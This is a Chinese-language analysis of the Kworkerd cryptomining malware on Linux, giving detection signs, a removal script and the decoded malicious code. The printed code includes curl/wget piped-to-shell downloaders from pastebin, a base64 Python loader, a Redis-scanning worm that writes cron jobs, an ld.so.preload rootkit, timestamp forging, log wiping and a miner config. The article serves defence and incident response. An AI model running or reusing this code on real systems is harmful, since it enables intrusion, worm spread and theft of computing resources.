压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

Kworkerd惡意挖礦分析

責(zé)編:gltian |2018-09-14 10:05:38

0x01 快速特征排查

TOP顯示CPU占用高,但是沒有高占用的進(jìn)程
Snipaste_2018-09-11_15-57-16.png

存在與未知服務(wù)器13531端口建立的TCP連接
Snipaste_2018-09-11_15-57-41.png

文件/etc/ld.so.preload中指向了/usr/local/lib/libntp.so
Snipaste_2018-09-11_15-58-17.png

存在可疑執(zhí)行base64編碼的python進(jìn)程
Snipaste_2018-09-11_15-58-34.png

0x02 快速清除

#!/bin/bash
ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v grep|awk '{print $2}'|xargs kill -9

echo "" > /etc/cron.d/root
echo "" > /etc/cron.d/system
echo "" > /var/spool/cron/root
echo "" > /var/spool/cron/crontabs/root
rm -rf /etc/cron.hourly/oanacron
rm -rf /etc/cron.daily/oanacron
rm -rf /etc/cron.monthly/oanacron

rm -rf /bin/httpdns
sed -i '$d' /etc/crontab

sed -i '$d' /etc/ld.so.preload
rm -rf /usr/local/lib/libntp.so

ps aux|grep kworkerds|grep -v color|awk '{print $2}'|xargs kill -9
rm -rf /tmp/.tmph
rm -rf /bin/kworkerds
rm -rf /tmp/kworkerds
rm -rf /usr/sbin/kworkerds
rm -rf /etc/init.d/kworker
chkconfig --del kworker

0x03 細(xì)節(jié)行為分析

搜索引擎查找相關(guān)問題,也有不少人碰到,比如:
Snipaste_2018-09-11_15-59-19.png

首先,CPU占用率100%,但是top命令查看,無法看到高占用進(jìn)程,懷疑植入了rootkit。
查看crontab的內(nèi)容,已經(jīng)被寫入了一個(gè)定時(shí)任務(wù),每半小時(shí)左右會(huì)從pastebin上下載腳本并且執(zhí)行(pastebin是任意上傳分享的平臺(tái),攻擊者借此實(shí)現(xiàn)匿名)
https://pastebin.com/raw/xbY7p5Tb
拿到xbY7p5Tb腳本內(nèi)容如下:
Snipaste_2018-09-11_15-59-59.png

(curl -fsSL https://pastebin.com/raw/Gw7mywhC || wget -q-O- https://pastebin.com/raw/Gw7mywhC)|base64 -d |/bin/bash

腳本中再次下載了另一個(gè)腳本,并且對(duì)腳本內(nèi)容進(jìn)行base64解碼后執(zhí)行:
Snipaste_2018-09-11_16-00-43.png

腳本主要邏輯提取內(nèi)容如下(省略了一堆調(diào)用的函數(shù)):

update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM )
if [ ${update}x = "update"x ];then
    echocron
else
    if [ ! -f "/tmp/.tmph" ]; then
        rm -rf /tmp/.tmpg
        python
    fi
    kills
    downloadrun
    echocron
    system
    top
    sleep 10
    port=$(netstat -anp | grep :13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
fi
#
#
#

該惡意腳本首先檢查更新,如果有更新,執(zhí)行echocron進(jìn)行更新操作
https://pastebin.com/raw/TzBeq3AM

Snipaste_2018-09-11_16-01-27.png

接著檢查了/tmp/.tmph文件是否存在,如果存在則刪除,并且執(zhí)行python函數(shù)
名為Python的函數(shù)在腳本中為:

function python() {
    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
    touch /tmp/.tmph

其中執(zhí)行的python代碼經(jīng)過了base64編碼,解碼后內(nèi)容為:

#coding: utf-8
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
    page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass

這段python代碼又從https://pastebin.com/raw/nYBpuAxT讀取了內(nèi)容,并且進(jìn)行了執(zhí)行:
Snipaste_2018-09-11_16-02-27.png

再次base64解碼后的最終代碼內(nèi)容如下,是一個(gè)針對(duì)redis的掃描攻擊腳本,用于擴(kuò)散感染:

#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
    tlist = []
    maxthreads = 20
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            s.connect((self.host, 6379))
            s.send('set backup1 "\n\n\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"rn')
            s.send('set backup2 "\n\n\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"rn')
            s.send('config set dir /var/spool/cronrn')
            s.send('config set dbfilename rootrn')
            s.send('savern')
            s.close()
        except Exception as e:
            pass
        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()

    newthread = staticmethod(newthread)

def get_ip_list():
    try:
        url = 'ident.me'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        req = conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip2 = result.read()
        ips2 = findall(r'd+.d+.', ip2)[0][:-2]
        for u in range(0, 10):
            ip_list1 = (ips2 + (str(u)) +'.')
            for i in range(0, 256):
                ip_list2 = (ip_list1 + (str(i)))
                for g in range(0, 256):
                    IP_LIST.append(ip_list2 + '.' + (str(g)))
    except Exception:
        pass

def runPortscan():
    get_ip_list()
    for host in IP_LIST:
        scanner.lck.acquire()
        if len(scanner.tlist) >= scanner.maxthreads:
            scanner.lck.release()
            scanner.evnt.wait()
        else:
            scanner.lck.release()
        scanner.newthread(host)
    for t in scanner.tlist:
        t.join()

if __name__ == "__main__":
    runPortscan()

上述攻擊腳本中,關(guān)鍵代碼如下,通過掃描redis的6379端口,如果沒有做訪問驗(yàn)證,則直接進(jìn)行遠(yuǎn)程命令執(zhí)行進(jìn)行感染。

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            s.connect((self.host, 6379))
            s.send('set backup1 "\n\n\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"rn')
            s.send('set backup2 "\n\n\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"rn')
            s.send('config set dir /var/spool/cronrn')
            s.send('config set dbfilename rootrn')
            s.send('savern')
            s.close()

主邏輯中的python函數(shù)執(zhí)行完畢,接著執(zhí)行主要邏輯代碼:

if [ ! -f "/tmp/.tmph" ]; then
        rm -rf /tmp/.tmpg
        python
    fi
    kills
    downloadrun
    echocron
    system
    top
    sleep 10
    port=$(netstat -anp | grep :13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron

kills函數(shù)主要是檢查是否有其他挖礦等程序在運(yùn)行,直接干掉,這里不做重點(diǎn)代碼內(nèi)容展示

downloadrun函數(shù)的內(nèi)容如下,從thyrsi.com中下載了一個(gè)偽裝為jpg的文件,保存為/tmp下的kworkerds并執(zhí)行:

function downloadrun() {
    ps=$(netstat -anp | grep :13531 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod 777 /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod 777 /tmp/kworkerds
            fi
                nohup /tmp/kworkerds >/dev/null 2>&1 &
        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

Kworkerds文件是挖礦本體程序,拿到后扔進(jìn)virustotal檢查結(jié)果:
Snipaste_2018-09-11_16-03-58.png

Snipaste_2018-09-11_16-04-10.png

接著執(zhí)行echocron函數(shù),該函數(shù)在各個(gè)定時(shí)任務(wù)文件中寫入下載惡意腳本并執(zhí)行的任務(wù),并且清除相關(guān)日志,這樣加大了清理的難度:
Snipaste_2018-09-11_16-04-36.png

echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|shn##" > /etc/cron.d/root
    echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|shn##" > /etc/cron.d/system
    echo -e "*/23 * * * *    (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|shn##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "*/31 * * * *    (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|shn##" > /var/spool/cron/crontabs/root
    mkdir -p /etc/cron.hourly
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    if [ ! -f "/etc/cron.hourly/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    fi
    mkdir -p /etc/cron.daily
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    if [ ! -f "/etc/cron.daily/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    fi
    mkdir -p /etc/cron.monthly
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    if [ ! -f "/etc/cron.monthly/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    fi
    touch -acmr /bin/sh /var/spool/cron/root
    touch -acmr /bin/sh /var/spool/cron/crontabs/root
    touch -acmr /bin/sh /etc/cron.d/system
    touch -acmr /bin/sh /etc/cron.d/root
    touch -acmr /bin/sh /etc/cron.hourly/oanacron
    touch -acmr /bin/sh /etc/cron.daily/oanacron
    touch -acmr /bin/sh /etc/cron.monthly/oanacron

之后執(zhí)行system和top函數(shù),system函數(shù)中下載了一個(gè)惡意的腳本文件放置在/bin目錄下,并且寫入定時(shí)任務(wù)。

function system() {
    if [ ! -f "/bin/httpdns" ]; then
        curl -fsSL https://pastebin.com/raw/Fj2YdETv -o /bin/httpdns && chmod 755 /bin/httpdns
        if [ ! -f "/bin/httpdns" ]; then
            wget  https://pastebin.com/raw/Fj2YdETv -O /bin/httpdns && chmod 755 /bin/httpdns
        fi
        if [ ! -f "/etc/crontab" ]; then
            echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
        else
            sed -i '$d' /etc/crontab && echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
        fi
    fi
}

其中httpdns的內(nèi)容為:
Snipaste_2018-09-11_16-05-49.png

改腳本再次下載了一個(gè)腳本進(jìn)行執(zhí)行,腳本內(nèi)容與上面主腳本內(nèi)容類似(刪減了kills system top幾個(gè)函數(shù);增加了init函數(shù),即下載執(zhí)行挖礦程序):
Snipaste_2018-09-11_16-06-26.png

Top函數(shù)主要進(jìn)行了rootkit的行為。
函數(shù)將偽裝為jpg的惡意鏈接庫文件下載,首先放置在/usr/local/lib目錄下,之后替換/etc/ld.so.preload文件,通過預(yù)加載劫持linux系統(tǒng)函數(shù),使得top、ps等命令無法找到挖礦進(jìn)程;
Snipaste_2018-09-11_16-06-57.png

關(guān)于preload預(yù)加載惡意動(dòng)態(tài)鏈接相關(guān),可以閱讀此文參考:

https://blog.csdn.net/aganlengzi/article/details/21824553

最后通過touch–acmr命令,掩蓋剛剛執(zhí)行的操作(使得文件存取時(shí)間和變動(dòng)時(shí)間與/bin/sh的日期一致,避免被懷疑)

function top() {
    mkdir -p /usr/local/lib/
    if [ ! -f "/usr/local/lib/libntp.so" ]; then
        curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        if [ ! -f "/usr/local/lib/libntp.so" ]; then
            wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        fi
    fi
    if [ ! -f "/etc/ld.so.preload" ]; then
        echo /usr/local/lib/libntp.so > /etc/ld.so.preload
    else
        sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
    fi
    touch -acmr /bin/sh /etc/ld.so.preload
    touch -acmr /bin/sh /usr/local/lib/libntp.so

執(zhí)行上述函數(shù)后,主腳本sleep10秒,判斷是否與13531端口建立了連接,如果沒有,則執(zhí)行downloadrunxm函數(shù)(之后可以看到,13531是與連接的礦池端口)。
Downloadrunxm函數(shù)中,同樣下載了一個(gè)偽裝的jpg文件,另存為/bin/config.json,又再次下載了kworkerds并且執(zhí)行:

function downloadrunxm() {
    pm=$(netstat -anp | grep :13531 | wc -l)
    if [ ${pm} -eq 0 ];then
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod 777 /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod 777 /bin/config.json
            fi
        fi
        if [ ! -f "/bin/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod 777 /bin/kworkerds
            if [ ! -f "/bin/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod 777 /bin/kworkerds
            fi
                nohup /bin/kworkerds >/dev/null 2>&1 &
        else
            nohup /bin/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

拿到的config.json的內(nèi)容如下:

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 0,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "stratum+tcp://xmr.f2pool.com:13531",
            "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}

連接的礦池為國(guó)內(nèi)的f2pool.com魚池:
Snipaste_2018-09-11_16-10-40.png

0x04 樣本收集分享

搜集遇到的惡意挖礦repo:https://github.com/MRdoulestar/whatMiner

原文鏈接:https://www.anquanke.com/post/id/159497

上一篇:沙箱、蜜罐和欺騙防御的區(qū)別

下一篇:Intel CSME 漏洞預(yù)警